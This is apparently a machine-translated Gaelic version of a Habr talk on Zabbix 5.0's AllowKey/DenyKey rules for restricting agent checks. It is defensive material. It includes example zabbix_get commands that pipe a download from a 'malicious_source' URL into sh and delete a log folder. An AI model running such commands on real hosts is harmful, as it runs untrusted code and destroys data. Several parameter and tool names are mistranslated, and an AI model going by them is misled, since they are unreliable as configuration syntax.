Taic liosta dhubh agus liosta geal airson metrics taobh àidseant ann an Zabbix 5.0

Taic liosta dhubh agus liosta geal airson meatrach taobh àidseant

Tikhon Uskov, Einnseanair Amalachaidh, Zabbix

Cùisean tèarainteachd dàta

Tha feart ùr aig Zabbix 5.0 a leigeas leat tèarainteachd ann an siostaman a leasachadh a’ cleachdadh Zabbix Agent agus a thèid an àite an t-seann pharamadair Dèan comas air RemoteCommands.

Tha leasachaidhean ann an tèarainteachd shiostaman stèidhichte air àidseant a’ tighinn bhon fhìrinn gum faod àidseant àireamh mhòr de ghnìomhan a dh’ fhaodadh a bhith cunnartach a dhèanamh.

• Faodaidh an neach-ionaid cha mhòr fiosrachadh sam bith a chruinneachadh, a’ toirt a-steach fiosrachadh dìomhair no a dh’ fhaodadh a bhith cunnartach, bho fhaidhlichean rèiteachaidh, faidhlichean log, faidhlichean facal-faire, no faidhlichean sam bith eile.

Mar eisimpleir, a’ cleachdadh goireas zabbix_get gheibh thu cothrom air liosta de luchd-cleachdaidh, na clàran dachaigh aca, faidhlichean facal-faire, msaa.

A’ faighinn cothrom air dàta a’ cleachdadh an goireas zabbix_get

FIOSRACHADH. Chan fhaighear dàta air ais ach ma tha an neach-ionaid air ceadan a leughadh air an fhaidhle fhreagarrach. Ach, mar eisimpleir, am faidhle /etc/passwd/ leughadh leis a h-uile neach-cleachdaidh.

• Faodaidh an neach-ionaid cuideachd òrdughan a dh’ fhaodadh a bhith cunnartach a chuir an gnìomh. Mar eisimpleir, iuchair *siostam.run[]** a’ leigeil leat òrdughan iomallach sam bith a chuir an gnìomh air nodan lìonra, a’ toirt a-steach ruith sgriobtaichean bho eadar-aghaidh lìn Zabbix a bhios cuideachd a’ cur an gnìomh òrdughan air taobh an àidseant.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Air Linux, bidh an t-àidseant a’ ruith gu bunaiteach às aonais sochairean freumha, agus air Windows bidh e a’ ruith mar sheirbheis mar System agus tha cothrom gun bhacadh air an t-siostam faidhle. Mar sin, mura tèid atharrachaidhean a dhèanamh air paramadairean Zabbix Agent às deidh an stàladh, tha cothrom aig an neach-ionaid air a’ chlàr, an siostam faidhle agus faodaidh e ceistean WMI a chuir an gnìomh.

Ann an dreachan nas tràithe am paramadair Dèan comas airRemoteCommands=0 ceadaichte ach na meatrach a chur à comas leis an iuchair *siostam.run[]** agus a’ ruith sgriobtaichean bhon eadar-aghaidh lìn, ach cha robh dòigh ann casg a chuir air ruigsinneachd air faidhlichean fa-leth, iuchraichean fa leth a cheadachadh no a chuir à comas a chaidh a chuir a-steach leis an neach-ionaid, no cuingealachadh a thoirt air cleachdadh paramadairean fa leth.

A’ cleachdadh am paramadair EnableRemoteCommand ann an dreachan nas tràithe de Zabbix

Ceadaich Key/DenyKey

Bidh Zabbix 5.0 a ’cuideachadh le bhith a’ dìon an aghaidh ruigsinneachd gun chead le bhith a ’toirt seachad liostaichean geala agus liostaichean dubha airson a bhith a’ ceadachadh agus a ’diùltadh meatrach air taobh an neach-ionaid.

Ann an Zabbix 5.0 a h-uile iuchair, a’ toirt a-steach *siostam.run[]** air an comasachadh, agus chaidh dà roghainn rèiteachaidh àidseant ùr a chur ris:

Ceadaich = - sgrùdaidhean ceadaichte;

AicheadhKey= - sgrùdaidhean toirmisgte;

far a bheil pàtran prìomh ainm le paramadairean a bhios a’ cleachdadh metacharacters (*).

Leigidh na h-iuchraichean AllowKey agus DenyKey leat metrics fa leth a cheadachadh no a dhiùltadh stèidhichte air pàtran sònraichte. Eu-coltach ri paramadairean rèiteachaidh eile, chan eil an àireamh de pharamadairean AllowKey / DenyKey cuingealaichte. Leigidh seo dhut mìneachadh gu soilleir dè dìreach as urrainn don neach-ionaid a dhèanamh san t-siostam le bhith a ’cruthachadh craobh de sgrùdaidhean - iuchraichean so-ghnìomhaichte, far a bheil àite glè chudromach aig an òrdugh anns a bheil iad sgrìobhte.

Sreath de riaghailtean

Tha na riaghailtean air an sgrùdadh san òrdugh anns an tèid iad a-steach don fhaidhle rèiteachaidh. Tha an iuchair air a sgrùdadh a rèir nan riaghailtean ron chiad gheama, agus cho luath ‘s a bhios iuchair an eileamaid dàta a’ freagairt ris a ’phàtran, tha e ceadaichte no àicheadh. Às deidh seo, stadaidh sgrùdadh riaghailtean agus thèid na h-iuchraichean a tha air fhàgail a leigeil seachad.

Mar sin, ma tha eileamaid a’ maidseadh an dà chuid ri cead agus riaghailt àicheadh, bidh an toradh an urra ri dè an riaghailt a tha sa chiad fhaidhle rèiteachaidh.

2 riaghailtean eadar-dhealaichte leis an aon phàtran agus iuchair vfs.file.size[/tmp/file]

An òrdugh airson na h-iuchraichean AllowKey/DenyKey a chleachdadh:

1. riaghailtean mionaideach,
2. riaghailtean coitcheann,
3. riaghailt toirmisgte.

Mar eisimpleir, ma tha feum agad air cothrom air faidhlichean ann am pasgan sònraichte, feumaidh tu an-toiseach cead a thoirt dhaibh faighinn a-steach, agus an uairsin a h-uile càil eile nach eil a 'tighinn a-steach do na ceadan stèidhichte a dhiùltadh. Ma thèid an riaghailt diùltadh a chleachdadh an toiseach, thèid ruigsinneachd don phasgan a dhiùltadh.

Sreath ceart

Ma dh’ fheumas tu leigeil le 2 ghoireas ruith tro *siostam.run[]**, agus thèid an riaghailt àicheadh ​​​​a shònrachadh an toiseach, cha tèid na goireasan a chuir air bhog, oir bidh a’ chiad phàtran an-còmhnaidh a rèir iuchair sam bith, agus thèid na riaghailtean às deidh sin a leigeil seachad.

Sreath ceàrr

Pàtrain

Riaghailtean bunaiteach

Is e abairt le cairtean fiadhaich a th’ ann am pàtran. Bidh am metacharacter (*) a’ maidseadh àireamh sam bith de charactaran aig suidheachadh sònraichte. Faodar metacharacters a chleachdadh an dà chuid anns a’ phrìomh ainm agus ann am paramadairean. Mar eisimpleir, faodaidh tu a 'chiad paramadair a mhìneachadh gu teann le teacsa, agus sònraich an ath fhear mar chairt-fiadhaich.

Feumaidh paramadairean a bhith dùinte ann an camagan ceàrnagach [].

• system.run[* - ceàrr
• vfs.file*.txt] - ceàrr
• vfs.file.*[*] - deas

Eisimpleirean de chleachdadh wildcard.

1. Anns a 'phrìomh ainm agus ann am paramadair. Anns a 'chùis seo, chan eil an iuchair a' freagairt ri iuchair coltach ris nach eil paramadair ann, oir anns a 'phàtran dh' ainmich sinn gu bheil sinn airson crìoch sònraichte fhaighinn den phrìomh ainm agus seata sònraichte de pharamadairean.
2. Mura h-eil am pàtran a 'cleachdadh camagan ceàrnagach, tha am pàtran a' ceadachadh a h-uile iuchair anns nach eil crìochan agus a 'diùltadh a h-uile iuchair anns a bheil am paramadair ainmichte.
3. Ma tha an iuchair sgrìobhte gu h-iomlan agus na paramadairean air an sònrachadh mar chairt-fiadhaich, maidsidh e iuchair coltach ris le paramadairean sam bith agus cha bhith e a’ freagairt ris an iuchair às aonais camagan ceàrnagach, i.e. bidh e ceadaichte no àicheadh.

Riaghailtean airson a bhith a 'lìonadh crìochan.

• Ma thathar an dùil iuchair le paramadairean a chleachdadh, feumar na paramadairean a shònrachadh anns an fhaidhle rèiteachaidh. Feumaidh paramadairean a bhith air an sònrachadh mar metacharacter. Feumar ruigsinneachd gu faidhle sam bith a dhiùltadh gu faiceallach agus aire a thoirt don fhiosrachadh a bheir an meatrach seachad fo litreachadh eadar-dhealaichte - le agus às aonais crìochan.

Feartan iuchraichean sgrìobhaidh le paramadairean

• Ma tha iuchair air a shònrachadh le paramadairean, ach tha na paramadairean roghainneil agus air an sònrachadh mar metacharacter, thèid iuchair gun pharamadairean a rèiteachadh. Mar eisimpleir, ma tha thu airson fiosrachadh fhaighinn mun luchd air an CPU a chur à comas agus sònrachadh gum bu chòir an iuchair system.cpu.load[*] a bhith à comas, na dì-chuimhnich gun till an iuchair às aonais crìochan an luach luchd cuibheasach.

Riaghailtean airson a bhith a 'lìonadh crìochan

Notaichean

adjustment

• Chan urrainn don neach-cleachdaidh cuid de riaghailtean atharrachadh, mar eisimpleir, riaghailtean lorg no riaghailtean fèin-chlàraidh àidseant. Chan eil riaghailtean AllowKey/DenyKey a’ toirt buaidh air na crìochan a leanas:
  - Ainm aoigheachd
  - HostMetadataItem
  - HostInterfaceItem

FIOSRACHADH. Ma chuireas rianaire iuchair à comas, nuair a thèid faighneachd dha, cha toir Zabbix seachad fiosrachadh air carson a tha an meatrach no an iuchair san roinn-seòrsaNOCHDADH'. Chan eil fiosrachadh mu toirmeasg air òrdughan iomallach a chuir an gnìomh cuideachd air a thaisbeanadh anns na faidhlichean log àidseant. Tha seo airson adhbharan tèarainteachd, ach faodaidh e dì-bhugachadh iom-fhillte a dhèanamh ma tha meatrach ann an roinn gun taic airson adhbhar air choireigin.

• Cha bu chòir dhut a bhith an urra ri òrdugh sònraichte sam bith airson faidhlichean rèiteachaidh taobh a-muigh a cheangal (mar eisimpleir, ann an òrdugh na h-aibideil).

Goireasan loidhne-àithne

Às deidh dhut na riaghailtean a stèidheachadh, feumaidh tu dèanamh cinnteach gu bheil a h-uile dad air a rèiteachadh gu ceart.

Faodaidh tu aon de thrì roghainnean a chleachdadh:

• Cuir meatrach ri Zabbix.
• Dèan deuchainn le zabbix_àidseant. Zabbix àidseant le roghainn -clò (-p) a’ sealltainn a h-uile iuchair (a tha ceadaichte gu bunaiteach) ach a-mhàin an fheadhainn nach eil ceadaichte leis an rèiteachadh. Agus leis an roghainn -deuchainn (-t) oir tillidh iuchair toirmisgte'Iuchair nì nach eil taic ann'.
• Dèan deuchainn le zabbix_faigh. Goireas zabbix_faigh le roghainn -k tillidh e'ZBX_NOTSUPPORTED: Meatrach neo-aithnichte'.

Ceadaich no diùltadh

Faodaidh tu cothrom air faidhle a dhiùltadh agus dearbhadh, mar eisimpleir, a’ cleachdadh a’ ghoireas zabbix_faighgu bheil cothrom air an fhaidhle air a dhiùltadh.

**

FIOSRACHADH. Thathas a’ seachnadh luachan sa pharameter.

Anns a 'chùis seo, faodar faighinn gu faidhle mar sin tro shlighe eadar-dhealaichte. Mar eisimpleir, ma tha symlink a’ leantainn thuige.

Thathas a’ moladh sùil a thoirt air diofar roghainnean airson a bhith a’ cur an sàs nan riaghailtean ainmichte, agus cuideachd aire a thoirt do na cothroman a th’ ann faighinn seachad air na toirmeasg.

Вопросы и ответы

Do cheist. Carson a chaidh pàtran cho iom-fhillte le a chànan fhèin a thaghadh airson cunntas a thoirt air riaghailtean, ceadan agus toirmeasg? Carson nach robh e comasach, mar eisimpleir, na h-abairtean cunbhalach a chleachdas Zabbix a chleachdadh?

Freagairt. Is e cùis dèanadais regex a tha seo oir mar as trice chan eil ann ach aon àidseant agus bidh e a’ sgrùdadh àireamh mhòr de mheatairean. Is e obair gu math trom a th’ ann an Regex agus chan urrainn dhuinn sgrùdadh a dhèanamh air mìltean de mheatairean san dòigh seo. Cairtean-fiadhaich - fuasgladh uile-choitcheann, air a chleachdadh gu farsaing agus sìmplidh.

Do cheist. Nach eil na faidhlichean Include ann an òrdugh na h-aibideil?

Freagairt. Cho fad ‘s as aithne dhomh, tha e cha mhòr do-dhèanta ro-innse dè an òrdugh anns an tèid riaghailtean a chuir an sàs ma sgaoileas tu na riaghailtean thairis air diofar fhaidhlichean. Tha mi a’ moladh a bhith a’ cruinneachadh a h-uile riaghailt AllowKey/DenyKey ann an aon Cuir a-steach faidhle, leis gu bheil iad ag eadar-obrachadh le chèile, agus a’ toirt a-steach am faidhle seo.

Do cheist. Ann an Zabbix 5.0 an roghainn 'Dèan comas airRemoteCommands=' a dhìth bhon fhaidhle rèiteachaidh, agus chan eil ach AllowKey/DenyKey ri fhaighinn?

Freagairt. Tha, tha sin ceart.

Спасибо за внимание!

Source: www.habr.com